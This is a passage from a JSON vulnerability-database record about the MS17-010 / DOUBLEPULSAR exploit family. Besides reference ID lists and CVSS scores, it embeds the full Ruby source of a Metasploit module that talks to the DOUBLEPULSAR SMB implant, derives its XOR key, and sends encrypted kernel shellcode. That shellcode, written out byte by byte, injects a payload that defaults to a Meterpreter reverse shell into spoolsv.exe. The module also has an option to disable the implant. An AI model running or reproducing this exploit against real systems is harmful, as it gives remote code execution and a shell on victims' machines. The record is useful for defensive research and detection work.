"MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96707", "SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0419", "CPAI-2017-0177", "CPAI-2017-0200", "CPAI-2017-0205", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-01T22:21:46", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-11-01T22:21:46", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-02] #"}, "lastseen": "2021-11-01T22:21:46", "differentElements": ["sourceData"], "edition": 63}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "ca5f767bfddf033d21774271f0a2bf45", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-11-02T22:13:12", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": 